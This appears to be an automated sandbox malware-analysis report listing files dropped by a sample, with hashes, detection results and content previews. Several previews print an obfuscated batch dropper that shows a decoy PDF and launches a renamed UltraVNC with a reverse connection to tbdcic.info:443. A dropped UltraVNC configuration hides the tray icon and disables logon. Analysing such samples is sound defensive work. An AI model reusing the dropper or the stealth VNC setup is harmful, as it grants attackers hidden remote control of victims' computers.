                                                                  SHA-512:BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
                                                                  Malicious:false
                                                                  Preview:@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim

                                                                  C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):867840
                                                                  Entropy (8bit):6.386550733462827
                                                                  Encrypted:false
                                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: T8xrZb7nBL.exe, Detection: malicious, Browse
                                                                  • Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
                                                                  • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1945368
                                                                  Entropy (8bit):6.532894678367002
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: T8xrZb7nBL.exe, Detection: malicious, Browse
                                                                  • Filename: Olz7TmvkEW.exe, Detection: malicious, Browse
                                                                  • Filename: mSRW5AfJpC.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\7ZipSfx.000\id2rlx.MxYNRd

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                  Category:dropped
                                                                  Size (bytes):605114
                                                                  Entropy (8bit):7.931189302613814
                                                                  Encrypted:false
                                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                  Malicious:false
                                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

                                                                  C:\Users\user\AppData\Local\Temp\7ZipSfx.000\wFUH4p.aEmode

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  File Type:Generic INItialization configuration [admin]
                                                                  Category:dropped
                                                                  Size (bytes):858
                                                                  Entropy (8bit):5.216893826927931
                                                                  Encrypted:false
                                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                  Malicious:false
                                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

                                                                  C:\Users\user\AppData\Local\Temp\MSIb9684.LOG

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):246
                                                                  Entropy (8bit):3.5197430193686525
                                                                  Encrypted:false
                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkN:Qw946cPbiOxDlbYnuRKDlDN
                                                                  MD5:356FFDCC684855A59598ABC6CFC05E4E
                                                                  SHA1:460F1C1E21E731AA9552EE1E81D9720164C2229B
                                                                  SHA-256:223F28B168F6CC7AFDA8643E6FB4AEC74C3146D06A57D95E985766F54BB145D4
                                                                  SHA-512:9EA151C7157C7F678B86A3B82ADA0D7B92A18C26BE331EBBC67DD8659D23C138AD4701A6B17524162005A12783CC8765ECAE47F21A3A59EC4E8A0C02EE3098FF
                                                                  Malicious:false
                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.2.9.:.1.8. .=.=.=.....

                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-23 07-29-13-128.log

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with very long lines (393)
                                                                  Category:dropped
                                                                  Size (bytes):16525
                                                                  Entropy (8bit):5.376360055978702
                                                                  Encrypted:false
                                                                  SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                  MD5:1336667A75083BF81E2632FABAA88B67
                                                                  SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                  SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                  SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                  Malicious:false
                                                                  Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29752
                                                                  Entropy (8bit):5.402505799794783
                                                                  Encrypted:false
                                                                  SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbz:/
                                                                  MD5:C05DB1121EFCAFBA3CCD51F33646E1C1
                                                                  SHA1:82ACAF4319092DFF6382229C0E1BE107D35A6BEE
                                                                  SHA-256:29F4F3DF19CC068B3D2A1E5D5E454B115606B9E95106FB4AA6C5C7ACD5195028
                                                                  SHA-512:5C7D59317F73C64E7FE3A23CA3807BD14EF43794DDC1322486D5608465EEC8518F5D62E09957C89311AA03D4B17D67CD3AC7C23223D98D4C1F0E654E73DE5F3F
                                                                  Malicious:false
                                                                  Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

                                                                  C:\Users\user\Downloads\Lom.pdf

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                  Category:dropped
                                                                  Size (bytes):605114
                                                                  Entropy (8bit):7.931189302613814
                                                                  Encrypted:false
                                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                  Malicious:false
                                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

                                                                  C:\Windows\Tasks\0271695705143540

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:DOS batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1063
                                                                  Entropy (8bit):5.595995239629694
                                                                  Encrypted:false
                                                                  SSDEEP:24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
                                                                  MD5:38910F2D879725612BA1097E1F825C1E
                                                                  SHA1:99F3C92122A6B333F94304DEED7D55D140BD9456
                                                                  SHA-256:6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
                                                                  SHA-512:BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
                                                                  Malicious:false
                                                                  Preview:@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim

                                                                  C:\Windows\Tasks\0271695705143540.cmd

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:DOS batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1063
                                                                  Entropy (8bit):5.595995239629694
                                                                  Encrypted:false
                                                                  SSDEEP:24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
                                                                  MD5:38910F2D879725612BA1097E1F825C1E
                                                                  SHA1:99F3C92122A6B333F94304DEED7D55D140BD9456
                                                                  SHA-256:6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
                                                                  SHA-512:BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
                                                                  Malicious:false
                                                                  Preview:@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim

                                                                  C:\Windows\Tasks\Nfe70s.UFVVkM

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):867840
                                                                  Entropy (8bit):6.386550733462827
                                                                  Encrypted:false
                                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

                                                                  C:\Windows\Tasks\UltraVNC.ini

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:Generic INItialization configuration [admin]
                                                                  Category:dropped
                                                                  Size (bytes):858
                                                                  Entropy (8bit):5.216893826927931
                                                                  Encrypted:false
                                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                  Malicious:false
                                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

                                                                  C:\Windows\Tasks\WPSela.LSZr7V

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1945368
                                                                  Entropy (8bit):6.532894678367002
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\WPSela.LSZr7V, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

                                                                  C:\Windows\Tasks\conhost.exe

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):867840
                                                                  Entropy (8bit):6.386550733462827
                                                                  Encrypted:false
                                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

                                                                  C:\Windows\Tasks\id2rlx.MxYNRd

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                  Category:dropped
                                                                  Size (bytes):605114
                                                                  Entropy (8bit):7.931189302613814
